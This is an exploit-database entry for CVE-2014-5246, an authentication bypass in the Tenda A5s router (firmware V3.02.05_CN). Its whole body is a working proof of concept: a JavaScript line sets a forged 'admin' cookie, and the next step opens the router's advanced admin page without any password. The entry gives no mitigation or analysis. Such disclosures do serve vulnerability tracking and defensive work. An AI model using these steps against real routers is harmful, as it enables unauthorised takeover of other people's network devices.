id: 22530
date: 08/18/2014
title: Tenda A5s Router Authentication Bypass
author: zixian
cves: CVE-2014-5246

-----------------------------------------------------------------------
Tenda A5s Router Authentication Bypass Vulnerability
-----------------------------------------------------------------------
Author : zixian
Mail : me@zixian.org
Date : Aug, 17-2014

Vendor : http://tenda.com.cn/
Link : http://tenda.com.cn/Catalog/Product/223
Version : V3.02.05_CN
CVE : CVE-2014-5246

Exploit & p0c
_____________

go to
http://192.168.2.1/

then set cookie with javascript

javascript:document.cookie='admin:language=zh-cn'

go to
http://192.168.2.1/advance.asp

you are the admin!

#  0day.today [2023-03-24]  #